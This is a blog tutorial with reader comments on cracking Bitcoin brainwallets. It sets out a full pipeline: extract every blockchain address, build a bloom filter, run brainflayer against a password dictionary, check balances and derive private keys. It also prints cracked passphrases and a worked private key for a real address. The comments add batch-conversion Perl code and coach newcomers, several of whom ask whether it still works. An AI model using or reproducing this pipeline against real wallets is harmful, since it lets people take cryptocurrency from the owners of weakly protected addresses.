Bitcoin Brainwallet Cracking Tools

Introduction:
New Cracking Tool Exposes Major Flaw in Bitcoin Brainwallets
http://www.coindesk.com/new-cracking-tool-exposes-major-flaw-in-bitcoin-brainwallets/

Download brainflayer: https://github.com/ryancdotorg/brainflayer

1. Password dictionary
Download CrackStation dictionary: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

2. Install Bitcoin Daemon: https://github.com/bitcoin/bitcoin

3. Open source blockchain tool Blockparser
Blockparser download: https://github.com/znort987/blockparser
Retrieve all Bitcoin addresses using Blockparser

./parser allBalances > allBalances.txt

awk '{ print $2 }' allBalances.txt > btcaddress.hex

4. Convert Bitcoin address to Hash160 address
Tool written in Perl: http://lenschulwitz.com/base58
A slight change is needed to make it convert a text file of addresses.

5. Convert the Hash160 addresses to a bloom filter file using hex2blf

hex2blf btcaddress.hex btcaddress.blf

6. Run brainflayer

brainflayer -b btcaddress.blf -i password.txt

7. Sample output: (first column is Bitcoin Hash160 address, the last column is the password)

6e24b1342852a8e4af3c63206f8b2266ba887ef6:u:str:1234
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi

long numeric passwords:

09b508bae503da42f05575891866d0072bcf65f6:u:str:011235813213455
32f6ace81715e0872e6db7ff4a280185205620a3:u:str:12345678901234567890
afe66e0314eb15a5cd01d95b94166ce995c3347d:u:str:000000000000000000000000000000

long alphabet passwords:

482bc0946efa74a5a3d005e693b2774e1aeb7dad:u:str:qwertyuiopasdfghjklzxcvbnm
4b1b231e9caa7f95d51ed7c99df68a5add5a1714:u:str:doandroidsdreamofelectricsheep
bf1f119153f6ecedb259f0043f9fbbc88687b22e:u:str:thepastisagrotesqueanimal

passwords made of sentences:

ac8dc3fcfa4e9e91dddfc0c3fe6d7e0021292036:u:str:may the force be with you
8b0a993126c3bf8f4b28c8264b553d6aa39f2956:u:str:Money is the root of all evil.
1622dc9d9e5423d7b84122f9ef7edfa1981d9960:u:str:nothing ventured nothing gained
0c7cdc2d447af8d422dd2b54cab2f274ca88131d:u:str:No one can make you feel inferior without your consent.
8ee2d47121c480c37f9dd0a88bddf2dc21b284da:u:str:The quick brown fox jumped over the lazy dog.
2029758fa9d81f9c36f4be2ab8696ad10fc602f8:u:str:The quick brown fox jumps over the lazy dog
838edc90c250d298fc115bf028164f105e228fb9:u:str:these aren't the droids you're looking for
8c4cfbd55dd01f6c221372eba1e57c7496d7239f:u:str:This is the way the world ends.
31ae15fc484cf5fd34ecd49e1afb51e3f2174a93:u:str:tomb-of-the-unknown-soldier-identification-badge

passwords in Chinese characters:

7afa3b687e58d3f16feccb8244b90a87a535b85c:u:str:试试看
73b1bebd338fc051dba7282d4f99846fac01df23:u:str:中国上海

8. Convert Hash160 address back to Bitcoin address
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
Converted to a Bitcoin address: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
The brainwallet password is 1satoshi

9. Bitcoin wallet balance
Check the Bitcoin balance on Blockchain.info

https://blockchain.info/q/addressbalance/1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

10. Private key for the Bitcoin address
Download open source tool Addressgen: https://github.com/sarchar/addressgen

Example: ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
Bitcoin address: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

Run

./genaddress.py -p 1satoshi

Output:

ECDSA private key (random number / secret exponent)
51b2156ca4b9d96c9e77938b1197b806a4a2822060da15d79f2f6f8f75655644
Bitcoin private key (Base58Check, uncompressed)
5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY
Bitcoin extended private key (Base58Check)
xprv9s21ZrQH143K3TEjPXq1CkrNDMfYWYwVNKVWqSPeEthWqd4uJKWSRnM2GX2BYktMDQrGxa2FZrpDdt5Q1qeLk4T46974eh9Eo7iHCfGcY37
(embedded private key) -> L43jHnozmKE5TYNqMwsPgXNcTfRT7TNhzDkTgaKAgYcx99Qm5LhB
------
ECDSA public key (uncompressed)
04a3599acf74fc7b781207860e8753f182fc4b8c5febe6c5f2e09381893abb4e0b290a172aa6a7ba13c5a32de6d10a024d95cf786d72e650889a4a22f29a3b84df
Bitcoin Address (uncompressed, length=34):
1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
Bitcoin extended public key
xpub661MyMwAqRbcFwKCVZN1Zto6mPW2v1fLjYR7dpoFoEEViRQ3qrpgyafW7nhb8fPtRaX2TJbCXQAfgAhMYGJ9DJeF1UVAMYu3Ucd3BqaeU9R
(embedded public key) -> 032131be64ba3f27e757c2f0f310038a8dfb768ff922448aff2841fa7954472880
(bitcoin address) -> 1Kvdg9jcdcdWGBb77Rovd8jkHjPd4eKB6t

As you can see above, the Bitcoin address is 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
and the private key is 5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY
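
The Base58Check conversion behind steps 4 and 8, as an added example (not code from the original post or from the linked Perl tool): it decodes an address to its Hash160 with checksum verification, encodes a Hash160 back to an address, and batch-converts a list while reporting malformed lines instead of passing them on. The function names are this example's own, and only version-0x00 addresses are handled.

```python
import hashlib

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

def _checksum(payload: bytes) -> bytes:
    # Base58Check checksum: first 4 bytes of SHA-256(SHA-256(payload))
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]

def address_to_hash160(address: str) -> str:
    """Step 4: decode a version-0x00 address to its 40-hex-char Hash160."""
    address = address.strip()
    num = 0
    for ch in address:
        if ch not in B58:
            raise ValueError(f"invalid Base58 character {ch!r}")
        num = num * 58 + B58.index(ch)
    zeros = len(address) - len(address.lstrip("1"))  # each leading '1' is a zero byte
    raw = b"\x00" * zeros + num.to_bytes((num.bit_length() + 7) // 8, "big")
    if len(raw) != 25 or raw[0] != 0:
        raise ValueError("not a 25-byte version-0x00 address")
    if _checksum(raw[:21]) != raw[21:]:
        raise ValueError("checksum mismatch")
    return raw[1:21].hex()

def hash160_to_address(h160_hex: str) -> str:
    """Step 8: encode a Hash160 as a version-0x00 Base58Check address."""
    raw = b"\x00" + bytes.fromhex(h160_hex)
    if len(raw) != 21:
        raise ValueError("Hash160 must be 20 bytes")
    raw += _checksum(raw)
    num, out = int.from_bytes(raw, "big"), ""
    while num:
        num, rem = divmod(num, 58)
        out = B58[rem] + out
    return "1" * (len(raw) - len(raw.lstrip(b"\x00"))) + out

def convert_lines(lines):
    """Batch form of step 4: returns (hash160 list, rejected (line, reason) list)."""
    good, bad = [], []
    for line in lines:
        try:
            good.append(address_to_hash160(line))
        except ValueError as exc:
            bad.append((line.strip(), str(exc)))
    return good, bad

if __name__ == "__main__":
    # Constructed input: the wiki test address quoted in the comments, then a one-character typo of it.
    sample = ["16UwLL9Risc3QfPqBUvKofHmBQ7wMtjvM\n", "16UwLL9Risc3QfPqBUvKofHmBQ7wMtjvN\n"]
    print(convert_lines(sample))
```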




21 thoughts on “Bitcoin Brainwallet Cracking Tools”

  • Monday July 25th, 2016 at 09:54
    Permalink

    I need a more in-depth tutorial on how to do this step by step properly. Thanks if you can send me one by email, please.

    Reply
  • Saturday July 30th, 2016 at 16:43
    Permalink

    Hi pal, great tut. Does this still work? Would love to give it a shot.

    Reply
  • Thursday September 22nd, 2016 at 03:24
    Permalink

    Hi,

    Great article!

    I have one problem though: at step 4, since I am not a developer, I am having a hard time figuring out what change to make so that it processes a whole file. I am using a CSV file which was generated by another blockparser (not znort’s) and it only outputs addresses in Base58.

    How could I convert them all in one go to hex format?

    Thanks in advance!

    Reply
    • Thursday September 22nd, 2016 at 15:46
      Permalink

      Download the Perl script from: http://lenschulwitz.com/b58/base58perl.txt
      rename it to base58perl.pl

      replace the last part of the script from:

      #Sample test taken from https://en.bitcoin.it/wiki/Technical_background_of_version_1_Bitcoin_addresses.
      my $base58_encoded_address = "16UwLL9Risc3QfPqBUvKofHmBQ7wMtjvM";
      print "\nRunning tests for bitcoin address $base58_encoded_address\n";
      print "Bitcoin address is valid.  Address type: '", check_bitcoin_address($base58_encoded_address), "'.\n";
      my $binary_address = decodebase58tohex($base58_encoded_address);
      print "Binary hexadecimal representation is: $binary_address\n";
      my $reencoded_base58 = encodebase58fromhex($binary_address);
      print "Re-encoded back to Base58 is: $reencoded_base58\n\n";

      to:

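      my $fileSrc = 'base58.txt';
      open(my $fhSrc, '<', $fileSrc) or die "Could not open $fileSrc: $!";

      my $fileDest = 'hex.txt';
      open(my $fhDest, '>>', $fileDest) or die "Could not open file $fileDest: $!";

      # Convert one Base58 address per line
      while (my $base58_encoded_address = <$fhSrc>) {
        $base58_encoded_address =~ s/\s+\z//;           # strip the newline (LF or CRLF) before decoding
        next unless length $base58_encoded_address;     # skip blank lines
        my $binary_address = decodebase58tohex($base58_encoded_address);
        print $fhDest "$binary_address\n";              # print avoids needing "use feature 'say'"
      }

      close $fhSrc;
      close $fhDest;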
      

      This should read the Base58 addresses from base58.txt and save the hex-format addresses to hex.txt.

      Reply
      • Thursday September 22nd, 2016 at 15:54
        Permalink

        Awesome, it worked!

        Thank you!

        Reply
  • Sunday September 25th, 2016 at 17:18
    Permalink

    Hopefully someone can make a full detail on how to make this work in Linux.

    Reply
    • Sunday September 25th, 2016 at 17:19
      Permalink

      A tutorial, I mean 🙂

      Reply
  • Wednesday November 9th, 2016 at 16:25
    Permalink

    How long does it take for you to get output from brainflayer? I have completed up to step #7 but now it appears brainflayer is either working in the background or doing nothing?

    I can make a video tut if Jack doesn’t mind. I can’t explain much of the background processes as I usually compile and pack all data tightly and quickly to script it.

    Reply
    • Sunday November 13th, 2016 at 21:58
      Permalink

      Use a known password for testing and you should see the output in one second.

      A video tutorial would be great. You can post the link here.

      Reply
    • Saturday January 21st, 2017 at 06:40
      Permalink

      Do you have a video tutorial? It would be great 😀

      Reply
  • Wednesday December 28th, 2016 at 01:05
    Permalink

    Does it still work?

    Reply
  • Friday January 20th, 2017 at 04:09
    Permalink

    Good day and keep up the good work. Please, I omitted steps 1 – 3 because I am trying to use my wallet ID to check how secure my wallet is, but got stuck on steps 4 to 5.
    I need clarification on the following as a newbie to programming:

    1. Do I need to follow the procedure you suggested on “Download the Perl script from: http://lenschulwitz.com/b58/base58perl.txt
    rename it to base58perl.pl”?
    2. If I am to do the same after the modification, where do I upload the update?

    3. After the aforementioned steps, in what environment in GitHub (is it “bitcoin command prompt” or “brainflayer command prompt”) do I input the command “hex2blf btcaddress.hex btcaddress.blf”?

    4. Also, will I replace btcaddress.hex with the hex value of my public key generated via http://lenschulwitz.com/base58?

    Thank you as I await your esteemed clarification.

    Reply
    • Tuesday January 24th, 2017 at 16:50
      Permalink

      1. Yes
      2. You upload the file to where the btcaddress.hex file is. Then run the Perl script to convert the addresses in btcaddress.hex to Hash160 format
      3. Run the command “hex2blf” in a Linux environment
      4. Yes, btcaddress.hex will be updated to Hash160 format

      Reply
  • Thursday January 26th, 2017 at 04:38
    Permalink

    Thanks so much for your valued feedback.
    Please help clarify, as I am new to programming and my background is Windows.
    1. Would all the downloads from step 1 to step 7 be mounted on a Linux OS like Ubuntu, KDE etc. or on GitHub?
    2. Please, under which tool will I locate btcaddress.hex?
    Apologies to bore you as I await your feedback.

    Reply
    • Tuesday February 7th, 2017 at 11:25
      Permalink

      1. All tools run on Linux OS
      2. You create the file btcaddress.hex at step 3

      Reply
